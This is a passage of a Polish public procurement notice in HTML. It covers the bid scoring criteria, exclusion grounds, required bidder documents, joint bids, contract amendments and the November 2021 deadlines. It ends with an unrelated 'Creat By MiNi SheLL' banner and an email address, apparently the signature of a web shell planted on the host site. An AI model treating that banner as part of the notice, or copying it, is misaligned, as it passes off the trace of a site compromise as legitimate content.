TERMIN PŁATNOŚCI - zostanie wyliczony na podstawie <br/>następującego zestawienia:	<br/>– 21 dni – 20 punktów;<br/>– 30 dni – 40 punktów;<br/><br/>Zamawiający określa minimalny termin płatności, jako 21 dni od daty <br/>otrzymania prawidłowo wystawionej faktury/rachunku. <br/><br/><br/>Liczbę punktów przyznaną za kryterium CENA (maksymalnie 60 pkt. ) sumuje się <br/>z liczbą punktów przyznaną za kryterium TERMIN PŁATNOŚCI (maksymalnie 40 pkt.) w ten sposób uzyskuje się całkowitą ilość punktów przyznaną ofercie (maksymalnie 100 pkt. ).<br/><br/> 6. Wynik – oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria), zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z liczbą uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty każdy Wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenia w zakresie wskazanym w załączniku nr 3 do SWZ. Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>	2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o których mowa w rozdziale VII pkt. 1 SWZ składa każdy <br/>	z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>	3. Na żądanie Zamawiającego Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniu, o którym mowa w rozdziale VII. pkt. 1 SWZ.<br/>	4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w rozdziale VII. pkt. 1 SWZ. Zobowiązanie w/w wykonawców do oddania własnych zasobów winno być sporządzone na piśmie.<br/><br/>UWAGA: niżej wymienione dokumenty składa wyłącznie Wykonawca, którego oferta w wyniku wstępnej oceny okaże się najkorzystniejsza:<br/><br/> 1) aktualny odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – Wykonawca nie jest zobowiązany do złożenia tego dokumentu, jeżeli Zamawiający może ten dokument uzyskać z pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczył dane umożliwiające dostęp do tych dokumentów;(w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa je każdy z Wykonawców);<br/> 2) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłaceniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa je każdy z Wykonawców);<br/> 3) aktualne zaświadczenie właściwej terenowej jednostki Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa je każdy z Wykonawców);<br/><br/> 5. Oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej – składa tylko Wykonawca najwyżej oceniony – wzór oświadczenia załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunku udziału <br/>w postępowaniu składa każdy z Wykonawców. Oświadczenie te ma potwierdzać brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu <br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/> Wykonawca w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby;<br/>Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/> a) oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/> b) sposób składania dokumentów w ofercie wspólnej:<br/>- dokumenty dotyczące własnej firmy, takie jak np. oświadczenie o braku podstaw do wykluczenia oraz spełnienia warunków udziału w postępowaniu składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu;<br/>- dokumenty wspólne takie jak np. formularz ofertowy, dokumenty podmiotowe i przedmiotowe (jeżeli dotyczy) składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z postanowieniami ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, pod warunkiem podpisania aneksu zaakceptowanego przez obie strony. <br/><br/>2. W szczególności Zamawiający dopuszcza:<br/>1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu, siedziby, osób reprezentujących strony, zmianę formy prawnej prowadzonej działalności; <br/>2) zmianę postanowień w zakresie podatku VAT:<br/>Jeżeli w trakcie obowiązywania umowy nastąpi zmiana w zakresie podatku VAT, Zamawiający zobowiązuje się do uiszczenia opłaty powiększonej lub pomniejszonej <br/>o obowiązującą stawkę podatku od towarów i usług na dzień wystawienia faktury VAT, na co Wykonawca wyraża zgodę;<br/>3) zmianę terminu realizacji przedmiotu zamówienia jedynie w przypadkach niezależnych od Wykonawcy, na skutek klęsk żywiołowych spowodowanych nieodwracalnymi działaniami przyrody lub na skutek działań osób trzecich. Udowodnienie ww. sytuacji leżeć będzie po stronie Wykonawcy.<br/>4) zmianę ceny zamawianego towaru w sytuacji określonej w §3 ust. 4 pkt. 1 i 2 umowy<br/>5) zmianę w razie zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, rozumieć należy zdarzenia zewnętrzne wobec łączącej strony więzi prawnej: <br/>a) o charakterze niezależnym od stron,<br/>b) którego strony nie mogły przewidzieć przed zawarciem umowy, <br/>c) którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com